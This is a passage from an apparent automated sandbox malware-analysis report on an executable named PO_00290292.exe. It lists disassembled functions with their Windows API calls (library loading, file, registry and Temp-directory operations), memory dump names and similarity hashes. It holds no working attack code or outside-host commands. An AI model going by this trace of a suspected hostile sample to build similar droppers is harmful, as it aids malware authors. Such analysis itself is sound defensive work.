                                                                  • API ID: InitializeMessageSendUninitialize
                                                                  • String ID:
                                                                  • API String ID: 2896919175-0
                                                                  • Opcode ID: 3868b5a52622b10a1177551b7cc78a5ffd836502efb30cae45cbc154cdcfe80d
                                                                  • Instruction ID: fd15c1a48ffcd0bde852b119af7687a848e5b357f1d71b2c4b4b2b4c4c2fcb19
                                                                  • Opcode Fuzzy Hash: 3868b5a52622b10a1177551b7cc78a5ffd836502efb30cae45cbc154cdcfe80d
                                                                  • Instruction Fuzzy Hash: 55F0F076645601CBD3101B54AD05B5B7268EF80781F56407EEE44A23F1CABA48428B2E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040156B Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: ShowWindow
                                                                  • String ID:
                                                                  • API String ID: 1268545403-0
                                                                  • Opcode ID: 4f5d9ef0beddd45689b81fa3b2d2ac104db1f3844eed1b1a0e4dc60d6ad0a3f0
                                                                  • Instruction ID: 3d140fe00ea388f21a06c6326494b10f153b64dd8f5dad9855b01bbfc98b082c
                                                                  • Opcode Fuzzy Hash: 4f5d9ef0beddd45689b81fa3b2d2ac104db1f3844eed1b1a0e4dc60d6ad0a3f0
                                                                  • Instruction Fuzzy Hash: 65E04876B00104DBCB24CBA4ED808AD77A6AB44310750497BD501B3660C675DC51CF28
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406558 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406585
                                                                    • Part of subcall function 004064E8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004064FF
                                                                    • Part of subcall function 004064E8: wsprintfW.USER32 ref: 0040653A
                                                                    • Part of subcall function 004064E8: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040654E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                  • String ID:
                                                                  • API String ID: 2547128583-0
                                                                  • Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                                  • Instruction ID: 8c1a5bb66f910ccc430fc34c4425cef617f316e2833151c7c1ff8c8a0ee84b40
                                                                  • Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                                  • Instruction Fuzzy Hash: C3E086326042206BD6105B706E0893762BC9ED8740302483EF946F2084D778DC329A6D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405D53 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\PO_00290292.exe,80000000,00000003), ref: 00405D57
                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D79
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate
                                                                  • String ID:
                                                                  • API String ID: 415043291-0
                                                                  • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                                  • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
                                                                  • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                                  • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405D2E Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,?,00405933,?,?,00000000,00405B09,?,?,?,?), ref: 00405D33
                                                                  • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405D47
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                  • Instruction ID: 62c1218995ad43f24aa052634507c0d83541fa9dca801c4eab67991220ff17ac
                                                                  • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                  • Instruction Fuzzy Hash: 40D01272504520AFC2513738EF0C89BBF95EB543B17028B35FAF9A22F0DB304C568A98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405829 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,004033A9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040582F
                                                                  • GetLastError.KERNEL32 ref: 0040583D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1375471231-0
                                                                  • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                                  • Instruction ID: d963a2520b22da8993c1f0374a54a6368e12bf2bf52e26206a68f99a8800bbf8
                                                                  • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                                  • Instruction Fuzzy Hash: 1DC04C31204B029AD7506B609F097177954AB50781F11C8396946E00A0DE348465DE2D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401673 Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 0040168E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: FileMove
                                                                  • String ID:
                                                                  • API String ID: 3562171763-0
                                                                  • Opcode ID: a51ebfd131b5ce1ad24a1fd58dead1362408043bc730019d15f3e82182553067
                                                                  • Instruction ID: f96437beda5fd31dd1875ddb5f908f1f3267c620ccf54a3d4895ce3c899c2c08
                                                                  • Opcode Fuzzy Hash: a51ebfd131b5ce1ad24a1fd58dead1362408043bc730019d15f3e82182553067
                                                                  • Instruction Fuzzy Hash: 50F0B431604114D7CB20BF7A4F0DD5E32A59F82338B25437BF912B62E6DAFC8A41956E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040229D Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringWrite
                                                                  • String ID:
                                                                  • API String ID: 390214022-0
                                                                  • Opcode ID: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                                  • Instruction ID: a822d11f1d05533bca3208a69e79300e3559a9020bae074bf72d5f6ed1f8f9d7
                                                                  • Opcode Fuzzy Hash: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                                  • Instruction Fuzzy Hash: BCE04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040172D Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401741
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: PathSearch
                                                                  • String ID:
                                                                  • API String ID: 2203818243-0
                                                                  • Opcode ID: 0ce7f8cd7b3dd26209cda17540e289f7ec9c7824dd55c0017d6758264515c3ca
                                                                  • Instruction ID: 9d0666dde0d895d2acfda9375e79d31dc3107899110506874ca2c1483bba1856
                                                                  • Opcode Fuzzy Hash: 0ce7f8cd7b3dd26209cda17540e289f7ec9c7824dd55c0017d6758264515c3ca
                                                                  • Instruction Fuzzy Hash: 2DE08676300100EBD750CFA4DE49AAA77ADDF40378F20417BF615E61D1E6B49A41973D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405E05 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040E2AE,0040CED0,004032EF,0040CED0,0040E2AE,00414ED0,00004000,?,00000000,00403119,00000004), ref: 00405E19
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                  • Instruction ID: dac0b8971ba2920abb5474f128329a0fa477ab7403896bbfc0984bb8014ca22f
                                                                  • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                  • Instruction Fuzzy Hash: 4AE08632100119ABCF105F50DC00EEB376CEB00350F004832FA65E2040E230EA219BE4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  • Opcode ID: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                                  • Instruction ID: ef45ff86538a2d51f1b0222ec8c1b297abd10be8bd22699319dc95f068cee933
                                                                  • Opcode Fuzzy Hash: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                                  • Instruction Fuzzy Hash: CCE08676244108BFDB00DFA8DE47FD537ECAB14700F004031BA08D70D1C674E5508768
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405DD6 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040336B,0040A230,0040A230,0040326F,00414ED0,00004000,?,00000000,00403119), ref: 00405DEA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                  • Instruction ID: f39de87387fc754cac4ceee649b5e38243fe2bf9183d254406dbd5143e25ae03
                                                                  • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                  • Instruction Fuzzy Hash: 57E0EC3221125AABDF509F65DC08AEB7B6DEF05360F008837F955E6160D631E9219BE8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004022DF Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402310
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
